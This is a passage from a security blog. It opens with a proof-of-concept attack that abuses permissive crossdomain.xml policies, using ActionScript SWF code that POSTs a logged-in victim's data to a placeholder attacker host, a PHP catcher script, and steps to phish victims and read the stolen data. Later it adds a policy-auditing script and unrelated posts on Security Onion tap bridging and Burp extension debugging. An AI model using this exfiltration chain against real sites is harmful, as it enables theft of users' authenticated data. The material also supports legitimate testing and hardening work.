</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">var</span><span style="background-color: #f8f8f8;"> getLoader</span><span style="background-color: #f8f8f8; color: #666666;">:</span><span style="background-color: #f8f8f8; color: #aa22ff;">URLLoader</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #666666;">=</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">new</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff;">URLLoader</span><span style="background-color: #f8f8f8;">();
getLoader.addEventListener(</span><span style="background-color: #f8f8f8; color: #aa22ff;">Event</span><span style="background-color: #f8f8f8;">.COMPLETE</span><span style="background-color: #f8f8f8; color: #666666;">,</span><span style="background-color: #f8f8f8;"> eventHandler);
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">try</span><span style="background-color: #f8f8f8;"> {
getLoader.load(readRequest);
} </span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">catch</span><span style="background-color: #f8f8f8;"> (error</span><span style="background-color: #f8f8f8; color: #666666;">:</span><span style="background-color: #f8f8f8; color: #aa22ff;">Error</span><span style="background-color: #f8f8f8;">) {
</span><span style="background-color: #f8f8f8; color: #00a000;">trace</span><span style="background-color: #f8f8f8;">(</span><span style="background-color: #f8f8f8; color: #bb4444;">"Error loading URL: "</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #666666;">+</span><span style="background-color: #f8f8f8;"> error);
}
}
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">private</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">function</span><span style="background-color: #f8f8f8;"> eventHandler(event</span><span style="background-color: #f8f8f8; color: #666666;">:</span><span style="background-color: #f8f8f8; color: #aa22ff;">Event</span><span style="background-color: #f8f8f8;">)</span><span style="background-color: #f8f8f8; color: #666666;">:</span><span style="background-color: #f8f8f8;">void {
</span><span style="background-color: #f8f8f8; color: #008800; font-style: italic;">// URL to which retrieved data is to be sent</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">var</span><span style="background-color: #f8f8f8;"> sendTo</span><span style="background-color: #f8f8f8; color: #666666;">:</span><span style="background-color: #f8f8f8; color: #aa22ff;">String</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #666666;">=</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #bb4444;">"</span><span style="background-color: yellow; color: #bb4444;">http://www.malicious-site.com/crossdomain/catcher.php</span><span style="background-color: #f8f8f8; color: #bb4444;">"</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">var</span><span style="background-color: #f8f8f8;"> sendRequest</span><span style="background-color: #f8f8f8; color: #666666;">:</span><span style="background-color: #f8f8f8; color: #aa22ff;">URLRequest</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #666666;">=</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">new</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff;">URLRequest</span><span style="background-color: #f8f8f8;">(sendTo);
sendRequest.method </span><span style="background-color: #f8f8f8; color: #666666;">=</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff;">URLRequestMethod</span><span style="background-color: #f8f8f8;">.POST</span><span style="background-color: #f8f8f8; color: #666666;">;</span><span style="background-color: #f8f8f8;">
sendRequest.data </span><span style="background-color: #f8f8f8; color: #666666;">=</span><span style="background-color: #f8f8f8;"> event.target.data</span><span style="background-color: #f8f8f8; color: #666666;">;</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">var</span><span style="background-color: #f8f8f8;"> sendLoader</span><span style="background-color: #f8f8f8; color: #666666;">:</span><span style="background-color: #f8f8f8; color: #aa22ff;">URLLoader</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #666666;">=</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">new</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff;">URLLoader</span><span style="background-color: #f8f8f8;">();
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">try</span><span style="background-color: #f8f8f8;"> {
sendLoader.load(sendRequest);
} </span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">catch</span><span style="background-color: #f8f8f8;"> (error</span><span style="background-color: #f8f8f8; color: #666666;">:</span><span style="background-color: #f8f8f8; color: #aa22ff;">Error</span><span style="background-color: #f8f8f8;">) {
</span><span style="background-color: #f8f8f8; color: #00a000;">trace</span><span style="background-color: #f8f8f8;">(</span><span style="background-color: #f8f8f8; color: #bb4444;">"Error loading URL: "</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #666666;">+</span><span style="background-color: #f8f8f8;"> error);
}
}
}
}
</span></pre>
</div>
<br />
4) Compile the ActionScript with mxmlc:<br />
<br /></div>
<div style="background: #f8f8f8; border-width: .1em .1em .1em .8em; border: solid gray; overflow: auto; padding: .2em .8em; width: auto;">
<pre style="line-height: 125%; margin: 0;"> /opt/flex/bin/mxmlc ~/crossdomain/<span style="line-height: 125%;">XDomainXploit.as</span></pre>
</div>
<div style="margin-bottom: 6pt; margin-top: 24pt;">
5) Move the compiled SWF somewhere inside your web root<br />
<div dir="ltr" style="margin-bottom: 0pt; margin-top: 0pt;">
<!-- HTML generated using hilite.me --><br />
<div style="background: #f8f8f8; border-width: .1em .1em .1em .8em; border: solid gray; overflow: auto; padding: .2em .8em; width: auto;">
<pre style="line-height: 125%; margin: 0;">mv ~/crossdomain/XDomainXploit.swf /var/www/crossdomain
</pre>
</div>
<div style="line-height: 1.15;">
<span style="background-color: white; color: #222222; font-family: "arial"; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
6) Create and save the catcher file. This PHP file takes the entire body of the incoming HTTP request and appends it to a file in /tmp. You can get a lot fancier with this, such as creating a separate file per victim, or by parsing the data within PHP and only writing the relevant information to disk.<br />
<br />
<div style="background: #f8f8f8; border-width: .1em .1em .1em .8em; border: solid gray; overflow: auto; padding: .2em .8em; width: auto;">
<pre style="line-height: 125%; margin: 0;">vi /var/www/catcher.php
<?php
$data = file_get_contents("php://input");
$ret = file_put_contents('/tmp/thanks_for_sharing.txt', $data, FILE_APPEND | LOCK_EX);
if($ret === false) {
die('Error writing to file');
}
else {
echo "$ret bytes written to file";
}
?>
</pre>
</div>
<br /></div>
7) Install PHP if it is not already installed:<br />
<br />
<div style="background: #f8f8f8; border-width: .1em .1em .1em .8em; border: solid gray; overflow: auto; padding: .2em .8em; width: auto;">
<pre style="line-height: 125%; margin: 0;"> apt-get install php5
</pre>
</div>
<br />
<div dir="ltr" style="margin-bottom: 0pt; margin-top: 0pt;">
8) Set your web server to support SSL.<br />
<br />
<i>*This step is optional, but if your Flash object is communicating with an HTTPS site and the secure="false" attribute is not set, your Flash object needs to have been loaded from an HTTPS site.</i><br />
<br />
The commands below show you <a href="http://charles.lescampeurs.org/2012/01/14/ubuntu-11-10-setting-up-apache2-and-ssl-with-self-signed-certificate">how to make a self-signed cert</a>. For a more realistic POC, you would want to purchase a valid SSL certificate so your victim user does not get any SSL errors.</div>
</div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<!-- HTML generated using hilite.me --><br />
<div style="background: #f8f8f8; border-width: .1em .1em .1em .8em; border: solid gray; overflow: auto; padding: .2em .8em; width: auto;">
<pre style="line-height: 125%; margin: 0;"> <span style="line-height: 125%;">make-ssl-cert generate-default-snakeoil --force-overwrite</span></pre>
<pre style="line-height: 125%; margin: 0;"><span style="line-height: 125%;"> a2enmod ssl</span></pre>
<pre style="line-height: 125%; margin: 0;"> a2ensite default-ssl
</pre>
</div>
<br /></div>
<div dir="ltr" style="margin-bottom: 0pt; margin-top: 0pt;">
9) Start [or restart] your web server<br />
<div style="line-height: 1.15;">
<span style="background-color: white; color: #222222; font-family: "arial"; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
</div>
<div style="background-color: #f8f8f8; border: solid gray; line-height: 1.15; overflow: auto; padding: 0.2em 0.8em; width: auto;">
<pre style="line-height: 16.25px;"> /etc/init.d/apache2 restart</pre>
</div>
</div>
<br />
10) Phish your victim to your site, <span style="color: red;">www.malicious-site.com/crossdomain/xdx.html</span><br />
<br />
11) Hope the victim is currently logged in to <span style="color: blue;">www.secret-site.com</span><br />
<br />
12) Collect and analyze your stolen data:<br />
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<div style="background-color: #f8f8f8; border: solid gray; overflow: auto; padding: 0.2em 0.8em; width: auto;">
<pre style="line-height: 16.25px;"> cat /tmp/thanks_for_sharing.txt</pre>
</div>
</div>
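The steps above show what an attacker gets out of a permissive policy; the flip side, for whoever owns the site, is auditing the policy itself. The script below is an added example, not part of this post or of the POC, that parses a crossdomain.xml and flags the settings the POC depends on: allow-access-from with domain="*", secure="false" on a policy served over HTTPS, a wildcard allow-http-request-headers-from (which is what lets the POST variant above set its own Content-Type), and a site-control that permits policy files anywhere on the site. The two policies embedded in it are constructed samples, and the served_over_https flag is an input the caller supplies, since the secure attribute only matters for an HTTPS site.<br />

```python
"""Audit a crossdomain.xml policy for the settings the POC above relies on.

Added example, not part of this post or of the POC code. Standard library only.
"""
import xml.etree.ElementTree as ET

# Constructed sample: the kind of policy that makes the SWF above work.
EXAMPLE_PERMISSIVE = """<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="all"/>
  <allow-access-from domain="*" secure="false"/>
  <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>
"""

# Constructed sample: one named partner host, secure left at its default of true.
EXAMPLE_HARDENED = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="partner.example.com"/>
</cross-domain-policy>
"""


def audit_crossdomain_policy(xml_text, served_over_https=True):
    """Return [(severity, message), ...] for a crossdomain.xml document.

    served_over_https is supplied by the caller: the secure attribute only matters
    for a policy served from an HTTPS site, where secure="false" lets a SWF loaded
    over plain HTTP read the HTTPS responses.
    """
    findings = []
    root = ET.fromstring(xml_text.strip())
    if root.tag != "cross-domain-policy":
        return [("high", "root element is <%s>, not <cross-domain-policy>" % root.tag)]

    site_control = root.find("site-control")
    if site_control is not None and site_control.get("permitted-cross-domain-policies") == "all":
        findings.append(("medium", 'site-control permits policy files anywhere on the site ("all")'))

    for rule in root.findall("allow-access-from"):
        domain = rule.get("domain", "")
        secure = rule.get("secure", "true").lower()
        if domain == "*":
            findings.append(("high", 'allow-access-from domain="*": any SWF on the Internet may read authenticated responses'))
        elif domain.startswith("*."):
            findings.append(("low", "allow-access-from trusts every host under %s" % domain[1:]))
        if served_over_https and secure == "false":
            findings.append(("high", 'allow-access-from domain="%s" sets secure="false": an HTTP-loaded SWF may read this HTTPS site' % domain))

    for rule in root.findall("allow-http-request-headers-from"):
        domain = rule.get("domain", "")
        headers = rule.get("headers", "")
        if domain == "*" and headers == "*":
            findings.append(("high", "any origin may send arbitrary request headers (e.g. a custom Content-Type, as in the POST POC above)"))
        elif domain == "*":
            findings.append(("medium", "any origin may send these request headers: %s" % headers))
    return findings


def severities(xml_text, served_over_https=True):
    """Convenience: just the severity labels, in order of detection."""
    return [sev for sev, _ in audit_crossdomain_policy(xml_text, served_over_https)]


if __name__ == "__main__":
    for name, policy in (("permissive", EXAMPLE_PERMISSIVE), ("hardened", EXAMPLE_HARDENED)):
        print("== %s ==" % name)
        for sev, msg in audit_crossdomain_policy(policy) or [("ok", "no findings")]:
            print("%-6s %s" % (sev, msg))
```

Point it at a policy fetched from your own site and read the findings as a checklist: a named domain list, secure left at its default, no header wildcard, and master-only site-control is what the hardened sample looks like.<br />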
<br />
<br />
<h2>
Related Work: </h2>
<div>
<ul>
<li><a href="http://sethsec.blogspot.com/2014/03/exploiting-insecure-crossdomain.html">Exploiting insecure crossdomain policies to bypass anti-CSRF tokens</a></li>
<li><a href="http://sethsec.blogspot.com/2014/07/crossdomain-bing.html">Real world exploitation of a misconfigured crossdomain.xml - Bing.com</a></li>
<li><a href="http://sethsec.blogspot.com/2014/07/cve-2014-2227.html">AirVision Controller v2.1.3 - Overly Permissive default crossdomain.xml</a></li>
<li><a href="http://sethsec.blogspot.com/2014/10/bsidesdc-2014.html">BSides DC 2014 - SWF Seeking Lazy Admin for Cross-Domain Action</a></li>
</ul>
</div>
Seth Art (http://www.blogger.com/profile/05253599496757968918), published 2014-01-28, updated 2014-12-30<br />
<h2>Configuring a bridged promisc interface in Security Onion</h2>
A few months ago I configured an all-in-one (server and sensor) Security Onion VM on my ESXi box. It took a while, but I finally found a good box that I could use for a physical sensor. I bought this <a href="http://barracuda.optrics.com/products/351-barracuda-ethernet-tap.aspx">Barracuda Ethernet TAP</a> back around 2007-9, and while it worked great, after I moved to my house, it has literally been collecting dust in my basement for years. Lucky for me, it still works! <br />
<br />
This is a non aggregating TAP, which means I have two "output" cables coming from the TAP to my IDS. On the physical server, I installed Security Onion as a sensor only, and the TAP interfaces ended up being eth0 and eth2 (eth1 is the mgmt. interface).<br />
<br />
I quickly realized that I only knew how to bond two interfaces together on CentOS/RedHat. It took a few hours of googling and trial and error, but I finally got eth0 and eth2 bonded/bridged together. <br />
<br />
Aside from the Security Onion install and configuring the interfaces (as shown below), the only other thing I needed to do was to install the <em>bridge-utils</em> package. Until I did that, even though my interfaces file was configured properly, the br0 interface would not come up. <br />
<br />
I don't want to lose the config that ended up working, so here is the final config for Ubuntu/Xubuntu:<br />
<br />
<!-- HTML generated using hilite.me --><br />
<div style="background: #f0f0f0; border-width: .1em .1em .1em .1em; border: solid gray; overflow: auto; padding: .2em .6em; width: auto;">
<pre style="line-height: 125%; margin: 0;"><span style="color: #c65d09; font-weight: bold;">seth@sensor-dell:~$</span> uname -a
<span style="color: #888888;">Linux sensor-dell 3.2.0-58-generic #88-Ubuntu SMP Tue Dec 3 17:37:58 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux</span>
<span style="color: #c65d09; font-weight: bold;">seth@sensor-dell:~$</span> <span style="color: #007020;">history</span> | grep bridge-utils
<span style="color: #888888;"> 67 sudo apt-get install bridge-utils</span>
<span style="color: #c65d09; font-weight: bold;">seth@sensor-dell:~$</span> cat /etc/network/interfaces
<span style="color: #888888;"># This configuration was created by the Security Onion setup script. The original network</span>
<span style="color: #888888;"># interface configuration file was backed up to /etc/networking/interfaces.bak.</span>
<span style="color: #888888;"># This file describes the network interfaces available on your system</span>
<span style="color: #888888;"># and how to activate them. For more information, see interfaces(5).</span>
<span style="color: #888888;"># loopback network interface</span>
<span style="color: #888888;">auto lo</span>
<span style="color: #888888;">iface lo inet loopback</span>
<span style="color: #888888;"># Management network interface</span>
<span style="color: #888888;">auto eth1</span>
<span style="color: #888888;">iface eth1 inet static</span>
<span style="color: #888888;"> address 192.168.0.202</span>
<span style="color: #888888;"> gateway 192.168.0.1</span>
<span style="color: #888888;"> netmask 255.255.255.0</span>
<span style="color: #888888;"> dns-nameservers 8.8.8.8 8.8.4.4</span>
<span style="color: #888888;">auto eth0</span>
<span style="color: #888888;">iface eth0 inet manual</span>
<span style="color: #888888;"> up ip link set eth0 promisc on arp off up</span>
<span style="color: #888888;"> down ip link set eth0 promisc off down</span>
<span style="color: #888888;"> post-up ethtool -G eth0 rx ; for i in rx tx sg tso ufo gso gro lro; do ethtool -K eth0 $i off; done</span>
<span style="color: #888888;"> post-up echo 1 > /proc/sys/net/ipv6/conf/eth0/disable_ipv6</span>
<span style="color: #888888;">auto eth2</span>
<span style="color: #888888;">iface eth2 inet manual</span>
<span style="color: #888888;"> up ip link set eth2 promisc on arp off up</span>
<span style="color: #888888;"> down ip link set eth2 promisc off down</span>
<span style="color: #888888;"> post-up ethtool -G eth2 rx ; for i in rx tx sg tso ufo gso gro lro; do ethtool -K eth2 $i off; done</span>
<span style="color: #888888;"> post-up echo 1 > /proc/sys/net/ipv6/conf/eth2/disable_ipv6</span>
<span style="color: #888888;">auto br0</span>
<span style="color: #888888;">iface br0 inet manual</span>
<span style="color: #888888;"> bridge_ports eth0 eth2</span>
<span style="color: #888888;"> up ip link set br0 promisc on arp off up</span>
<span style="color: #888888;"> down ip link set br0 promisc off down</span>
<span style="color: #888888;"> post-up ethtool -G br0 rx ; for i in rx tx sg tso ufo gso gro lro; do ethtool -K br0 $i off; done</span>
<span style="color: #888888;"> post-up echo 1 > /proc/sys/net/ipv6/conf/br0/disable_ipv6</span>
</pre>
</div>
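A quick way to keep a config like this honest on a sensor is to lint it. The script below is an added example, not from this post or from Security Onion: it parses interfaces(5) stanzas and, for br0 and each interface named in its bridge_ports line, checks the things a passive tap interface should have: method manual (no address on the tap port), promisc on, arp off, IPv6 disabled, and the ethtool offloads switched off. The sample text inside it is a shortened, constructed copy of the config above, with the offload line deliberately left out of eth2 so one miss shows up.<br />

```python
"""Lint /etc/network/interfaces for the passive-tap settings used above.

Added example, not part of this post or of Security Onion. Standard library only.
"""
import re

# Constructed from the post's config, shortened; eth2 is missing its offload line on purpose.
SAMPLE_INTERFACES = """
auto lo
iface lo inet loopback
# Management network interface
auto eth1
iface eth1 inet static
    address 192.168.0.202
    gateway 192.168.0.1
    netmask 255.255.255.0
auto eth0
iface eth0 inet manual
    up ip link set eth0 promisc on arp off up
    down ip link set eth0 promisc off down
    post-up ethtool -G eth0 rx ; for i in rx tx sg tso ufo gso gro lro; do ethtool -K eth0 $i off; done
    post-up echo 1 > /proc/sys/net/ipv6/conf/eth0/disable_ipv6
auto eth2
iface eth2 inet manual
    up ip link set eth2 promisc on arp off up
    down ip link set eth2 promisc off down
    post-up echo 1 > /proc/sys/net/ipv6/conf/eth2/disable_ipv6
auto br0
iface br0 inet manual
    bridge_ports eth0 eth2
    up ip link set br0 promisc on arp off up
    down ip link set br0 promisc off down
    post-up ethtool -G br0 rx ; for i in rx tx sg tso ufo gso gro lro; do ethtool -K br0 $i off; done
    post-up echo 1 > /proc/sys/net/ipv6/conf/br0/disable_ipv6
"""

# Keywords that start a new top-level entry and therefore end the current iface stanza.
TOP_LEVEL = ("auto", "allow-hotplug", "allow-auto", "source", "source-directory", "mapping")


def parse_interfaces(text):
    """Return {name: {"method": str, "options": [option lines]}} from interfaces(5) text."""
    stanzas = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if parts[0] == "iface" and len(parts) >= 4:
            current = parts[1]
            stanzas[current] = {"method": parts[3], "options": []}
        elif parts[0] in TOP_LEVEL:
            current = None
        elif current is not None:
            stanzas[current]["options"].append(line)
    return stanzas


def check_capture_interface(name, stanzas):
    """Problems with one capture interface or bridge; an empty list means it passes."""
    stanza = stanzas.get(name)
    if stanza is None:
        return ["no iface stanza"]
    problems = []
    if stanza["method"] != "manual":
        problems.append("method is %s, expected manual (a tap port must not carry an address)" % stanza["method"])
    opts = "\n".join(stanza["options"])
    if not re.search(r"\bpromisc on\b", opts):
        problems.append("promiscuous mode is not enabled")
    if not re.search(r"\barp off\b", opts):
        problems.append("ARP is not disabled (the sensor would answer on the tap)")
    if "disable_ipv6" not in opts:
        problems.append("IPv6 is not disabled (router solicitations would leak onto the tap)")
    if not re.search(r"ethtool -K %s \$i off" % re.escape(name), opts):
        problems.append("NIC offloads are not disabled (captured packets may be coalesced or mis-sized)")
    return problems


def check_bridge(bridge, stanzas):
    """Validate the bridge and every port listed in its bridge_ports line."""
    report = {}
    ports = []
    for opt in stanzas.get(bridge, {"options": []})["options"]:
        if opt.split()[0] == "bridge_ports":
            ports = opt.split()[1:]
    if not ports:
        report[bridge] = ["no bridge_ports line (and bridge-utils must be installed for br0 to come up)"]
        return report
    report[bridge] = check_capture_interface(bridge, stanzas)
    for port in ports:
        report[port] = check_capture_interface(port, stanzas)
    return report


if __name__ == "__main__":
    for iface, problems in check_bridge("br0", parse_interfaces(SAMPLE_INTERFACES)).items():
        print("%s: %s" % (iface, "OK" if not problems else "; ".join(problems)))
```

Run it against the real file by replacing SAMPLE_INTERFACES with open("/etc/network/interfaces").read(); the management interface (eth1 here) is expected to fail every check, which is exactly why it should never be a bridge port.<br />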
Seth Art (http://www.blogger.com/profile/05253599496757968918), published 2014-01-14, updated 2014-12-30<br />
<h2>Writing and Debugging BurpSuite Extensions in Python</h2>
<span style="font-family: Arial, Helvetica, sans-serif;">When I first started with Burp extensions over a year ago, I used the <a href="https://github.com/zynga/hiccup">hiccup framework</a> to develop my plugins. Hiccup had a way of monitoring my custom "plugin" for changes each time it performed an action. As a result, it appeared that any changes I made to a plugin took effect in Burp instantly. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Well, when Burp Extender API 1.5 came out, while it greatly improved what could be done with Burp extensions, it also broke projects like Hiccup. Not wanting to be dependent on another non-PortSwigger API, I decided to spend whatever time I needed to learn how to interface with the Burp API directly. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">As I began, one frustrating thing I realized was that I had to reload my extension each time I made even the smallest change. This process takes some time, and because I am using Jython, it sucks some memory each time the extension is reloaded. I finally gave in and <a href="http://forum.portswigger.net/thread/1024/developing-debugging-python-extensions">asked </a></span><span style="font-family: Arial;"><a href="http://forum.portswigger.net/thread/1024/developing-debugging-python-extensions">on the Burp Suite forum</a> if anyone had a better way of writing and/or debugging Burp Extensions in Python. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">It turns out someone did. <a href="http://forum.portswigger.net/user/857">elespike</a> figured out that if you move your new functionality to a second file, you could import it once, and then reload it as frequently as you like. His guidance is in the thread listed above, but I thought it would be helpful to blog my entire solution. Also, after he pointed me in the direction of the reload, I went back to look at hiccup, and that is in fact what chair6 was doing to make hiccup reload the plugin. </span><br />
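To see the trick on its own, outside Burp, here is an added example that is not from this post, the forum thread, or hiccup. It plays both roles: it writes a small helper module to a temp directory (standing in for the second file), imports it once, and then reloads it before each "action", so an edit to the file is picked up without reloading anything else. Burp's Jython is Python 2, where reload() is a builtin; the example uses Python 3's importlib.reload(). The module name hot_module, its handle() function and the temp directory are assumptions of the example.<br />

```python
"""Import once, reload on every action: the pattern from the post, outside Burp.

Added example; not from this post, the forum thread or hiccup. Burp's Jython is
Python 2, where reload() is a builtin; this uses Python 3's importlib.reload().
The helper module name (hot_module) and the temp directory are assumptions.
"""
import importlib
import os
import shutil
import sys
import tempfile

MODULE_NAME = "hot_module"  # plays the role of UniqueParamValues in the post


def write_module(directory, source):
    """Save the helper's source, the way you would from your editor."""
    path = os.path.join(directory, MODULE_NAME + ".py")
    with open(path, "w") as fh:
        fh.write(source)
    return path


def load_once(directory):
    """What the extension does when Burp loads it: import the helper a single time."""
    if directory not in sys.path:
        sys.path.insert(0, directory)
    importlib.invalidate_caches()
    return importlib.import_module(MODULE_NAME)


def run_action(module, params):
    """What the extension does on each action (menu click, request received, ...):
    reload the helper so an edited file takes effect, then call into it.

    reload() re-executes the module's source in the existing module object, so no
    extension unload/reload (and, in Burp's case, no new Jython runtime) is needed.
    """
    module = importlib.reload(module)
    return module.handle(params)


def demo():
    """Edit the helper between two actions; the second action sees the edit."""
    params = ["a=1", "b=2", "a=1"]  # constructed stand-in for request parameters
    directory = tempfile.mkdtemp()
    try:
        write_module(directory, "def handle(params):\n    return len(params)\n")
        module = load_once(directory)
        before = run_action(module, params)   # counts every parameter: 3
        # "Edit" the helper: count unique values instead, as UniqueParamValues would.
        write_module(directory, "def handle(params):\n    return len(set(params))\n")
        after = run_action(module, params)    # the reload picked up the edit: 2
        return before, after
    finally:
        sys.modules.pop(MODULE_NAME, None)
        if directory in sys.path:
            sys.path.remove(directory)
        shutil.rmtree(directory, ignore_errors=True)
```

The one thing to keep in mind is that reload() re-runs the module's top-level code but leaves already-created objects alone, so keep state (loaders, callbacks, cached helpers) in the extension file and only the logic you are iterating on in the reloaded module.<br />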
<span style="font-family: Arial;"></span><br />
<span style="font-family: Arial;">And it is <strong><span style="font-size: large;">WAY BETTER.</span></strong> It saves a ton of time. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">So, with that intro, I wanted to document what I did. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><strong><u>Step 1</u></strong></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br />In Burp >> Extensions >> Options, I set my "<em>Folder for loading modules (optional)</em>" to c:\python\lib</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><strong><u>Step 2</u></strong><br />
<strong><u></u></strong><br />
<span style="font-family: Arial;">I then created my Burp Extension file. Where I would normally include all of my extension logic in this file, I instead moved all of my custom functions to another file (shown in step 3):</span><br />
<!-- HTML generated using hilite.me --></span><br />
<div style="background: #f0f0f0; border-width: .1em .1em .1em .1em; border: solid gray; overflow: auto; padding: .2em .6em; width: auto;">
<pre style="line-height: 125%; margin: 0;"><span style="font-family: Arial, Helvetica, sans-serif;"><span style="color: #007020; font-weight: bold;">from</span> <span style="color: #0e84b5; font-weight: bold;">burp</span> <span style="color: #007020; font-weight: bold;">import</span> IBurpExtender
<span style="color: #007020; font-weight: bold;">from</span> <span style="color: #0e84b5; font-weight: bold;">burp</span> <span style="color: #007020; font-weight: bold;">import</span> IContextMenuFactory
<span style="color: #007020; font-weight: bold;">from</span> <span style="color: #0e84b5; font-weight: bold;">burp</span> <span style="color: #007020; font-weight: bold;">import</span> IExtensionHelpers
<span style="color: #007020; font-weight: bold;">from</span> <span style="color: #0e84b5; font-weight: bold;">javax.swing</span> <span style="color: #007020; font-weight: bold;">import</span> JMenuItem
<span style="color: #007020; font-weight: bold;">from</span> <span style="color: #0e84b5; font-weight: bold;">java.awt.event</span> <span style="color: #007020; font-weight: bold;">import</span> ActionListener
<span style="color: #007020; font-weight: bold;">from</span> <span style="color: #0e84b5; font-weight: bold;">java.awt.event</span> <span style="color: #007020; font-weight: bold;">import</span> ActionEvent
<span style="color: #007020; font-weight: bold;">from</span> <span style="color: #0e84b5; font-weight: bold;">java.awt.event</span> <span style="color: #007020; font-weight: bold;">import</span> KeyEvent
<span style="color: #007020; font-weight: bold;">import</span> <span style="color: #0e84b5; font-weight: bold;">traceback</span>

<span style="color: #60a0b0; font-style: italic;"># Burp is configured to look for python modules in c:\python27\lib.</span>
<span style="color: #60a0b0; font-style: italic;"># If the following file exists in that directory, it will be loaded.</span>
<span style="color: #007020; font-weight: bold;">import</span> <span style="color: #0e84b5; font-weight: bold;">UniqueParamValues</span>

<span style="color: #007020; font-weight: bold;">class</span> <span style="color: #0e84b5; font-weight: bold;">BurpExtender</span>(IBurpExtender, IContextMenuFactory, ActionListener):
    <span style="color: #007020; font-weight: bold;">def</span> <span style="color: #06287e;">__init__</span>(<span style="color: #007020;">self</span>):
        <span style="color: #007020;">self</span><span style="color: #666666;">.</span>menuItem <span style="color: #666666;">=</span> JMenuItem(<span style="color: #4070a0;">'Print Unique Parameter Values'</span>)
        <span style="color: #007020;">self</span><span style="color: #666666;">.</span>menuItem<span style="color: #666666;">.</span>addActionListener(<span style="color: #007020;">self</span>)

    <span style="color: #007020; font-weight: bold;">def</span> <span style="color: #06287e;">actionPerformed</span>(<span style="color: #007020;">self</span>, actionEvent):
        <span style="color: #007020; font-weight: bold;">print</span> <span style="color: #4070a0;">"*"</span> <span style="color: #666666;">*</span> <span style="color: #40a070;">60</span>
        <span style="color: #60a0b0; font-style: italic;"># Here is the reload. You can place this anywhere you want, but you will </span>
        <span style="color: #60a0b0; font-style: italic;"># most likely want to place this within an action (request received, menu</span>
        <span style="color: #60a0b0; font-style: italic;"># item clicked, scanner started, etc). </span>
        <span style="color: #007020;">reload</span>(UniqueParamValues)
        <span style="color: #60a0b0; font-style: italic;"># This try statement, and the traceback included in the except, are what</span>
        <span style="color: #60a0b0; font-style: italic;"># allowed me to finally get the trace information I needed to debug my </span>
        <span style="color: #60a0b0; font-style: italic;"># issues. I highly recommend including these when developing Burp </span>
        <span style="color: #60a0b0; font-style: italic;"># Extensions.</span>
        <span style="color: #007020; font-weight: bold;">try</span>:
            UniqueParamValues<span style="color: #666666;">.</span>getUniqueParams(<span style="color: #007020;">self</span>)
        <span style="color: #007020; font-weight: bold;">except</span>:
            tb <span style="color: #666666;">=</span> traceback<span style="color: #666666;">.</span>format_exc()
            <span style="color: #007020; font-weight: bold;">print</span> tb

    <span style="color: #60a0b0; font-style: italic;"># implement IBurpExtender</span>
    <span style="color: #007020; font-weight: bold;">def</span> <span style="color: #06287e;">registerExtenderCallbacks</span>(<span style="color: #007020;">self</span>, callbacks):
        <span style="color: #60a0b0; font-style: italic;"># keep a reference to our callbacks object (Burp Extensibility Feature)</span>
        <span style="color: #007020;">self</span><span style="color: #666666;">.</span>_callbacks <span style="color: #666666;">=</span> callbacks
